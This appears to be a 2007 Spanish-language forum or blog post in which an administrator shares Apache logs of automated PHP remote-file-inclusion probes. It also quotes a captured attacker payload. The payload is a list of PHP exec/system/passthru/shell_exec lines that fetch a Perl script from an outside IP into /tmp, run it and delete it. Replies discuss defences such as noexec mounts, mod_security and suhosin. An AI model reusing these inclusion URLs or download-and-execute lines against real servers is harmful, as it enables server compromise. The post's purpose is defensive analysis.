A ultimas fechas me he encontrado con que los defacers y/o script kiddies ya tienen unos scripts (valga la rebusnancia), automatizados en perl
[code=’Bash’]
dominioatacado.com:75.126.134.16 – – [10/Jul/2007:01:34:30 -0500] «GET /guruforo/index.php/modules/Forums/admin/admin_styles.php?phpb
b_root_path=http://floydz.imess.net/cmd.txt? HTTP/1.1» 200 56485 «-» «libwww-perl/5.805»
dominioatacado.com:75.126.134.16 – – [10/Jul/2007:10:07:56 -0500] «GET /guruforo/index.php/MOD_forum_fields_parse.php?phpbb_root_path
=http://floydz.imess.net/cmd.txt? HTTP/1.1» 200 56480 «-» «libwww-perl/5.805»
dominioatacado.com:64.92.199.49 – – [10/Jul/2007:09:18:29 -0500] «GET / HTTP/1.0» 200 8571 «-» «libwww-perl/5.805»
dominioatacado.com:64.92.199.37 – – [10/Jul/2007:09:24:19 -0500] «GET / HTTP/1.0» 200 8571 «-» «libwww-perl/5.805»
legiondominioatacado.com:81.34.160.119 – – [10/Jul/2007:05:49:59 -0500] «GET /perlyell.gif HTTP/1.0» 200 750 «http://www.legion
dominioatacado.com/index3.html» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)»
legiondominioatacado.com:201.159.1.60 – – [10/Jul/2007:17:58:35 -0500] «GET /perlyell.gif HTTP/1.1» 200 750 «http://www.legiona
dominioatacado.com/index3.html» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)»
dominioatacado.com:80.247.202.176 – – [10/Jul/2007:05:16:30 -0500] «GET /portal/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_co
ntent&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.eclypse.info/img/ec.gif? HTTP/1.1» 200 28 «-» «libwww
-perl/5.803»
dominioatacado.com:80.247.202.176 – – [10/Jul/2007:05:16:34 -0500] «GET /portal/index.php?_REQUEST=&_REQUEST%5boption%5d=com_con
tent&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.eclypse.info/img/ec.gif? HTTP/1.1» 200 28 «-» «libwww-
perl/5.803»
dominioatacado.com:208.53.170.15 – – [10/Jul/2007:02:55:33 -0500] «GET /portal2//index2.php?showpage=http://85.114.143.143/dai
sy/robotto.txt?? HTTP/1.1» 200 604 «-» «libwww-perl/5.805»
dominioatacado.com:208.53.170.15 – – [10/Jul/2007:03:01:23 -0500] «GET /portal2//index2.php?showpage=http://85.114.143.143/dai
sy/robotto.txt?? HTTP/1.1» 200 604 «-» «libwww-perl/5.805»
dominioatacado.com:65.98.55.194 – – [10/Jul/2007:03:01:24 -0500] «GET /portal2//index2.php?showpage=http://85.114.143.143/dais
y/robotto.txt?? HTTP/1.1» 200 604 «-» «libwww-perl/5.805»
[/code]
Todo con libwww-perl :D
Y pues de ahi ya llaman a shells, backdoors, bots y otras cochinadas, sin embargo me parecio un tanto interesante el que ahora automaticen y que hasta parezca que tiene un batch de diferentes pruebas para diferentes scripts (de hecho solo postee lo que dio 202, tengo un monton de 404, pero haria crecer este post)
http://85.114.143.143/daisy/robotto.txt
[code=’PHP’]
echo exec(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo exec(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo exec(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo exec(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo passthru(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo passthru(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo passthru(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo passthru(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo system(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo system(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo system(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo system(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
[/code]
Claro que mucho de esto nomas con tener /tmp con noexec y nosuid pues ha dejado fuera estos scripts, sin embargo muchos seguro no han contado con que a ultimas fechas tambien se puede usar /dev/shm para intentar usar esto (asi que no es mala idea en el fstab tener /tmp y /dev/shm como noexec y nosuid)
En todo caso me pregunto por que mod_security no ha llegado a Etch. :/
Hola, eso que ni que, yo creo que todos los servidores pasan todos los dias por esas pruebas de servidores remotos para comprometerlos, pero por lo que se ve mucho esta orientado a aplicaciones en php, no soy un gurú pero creo que la implementación de php5, ayudarÃa en la seguridad.
Sobre mod_security, creo que es al contrario lo que ha sucedido, ya que en ramas anteriores en Debian, anteriores de etch, se tenia mod_security, pero por cuestiones de licencias lo han sacado, por lo que ahora ya no saldrá más, pero para eso ha salido otro proyecto llamado mod_ifier:
http://www.steve.org.uk/Software/mod_ifier/
El cual no esta en etch, por ser nuevo apenas, tal vez lenny u otro release despúes de ese ya lo incluyan.
Hace poco tuve contacto por correo por el mantainer de mod_security, quién aún sigue manteniendo el paquete claro fuera de Debian, puedes encontrar los .deb aquÃ:
http://etc.inittab.org/~agi/debian/libapache-mod-security2/
Saludos :-D.
Otro paquete que puede servir tanto para php4 como php5, es el suhosin:
php4-suhosin
php5-suhosin
No lo conocia hasta apenas, y me ha alertado de varias cosas.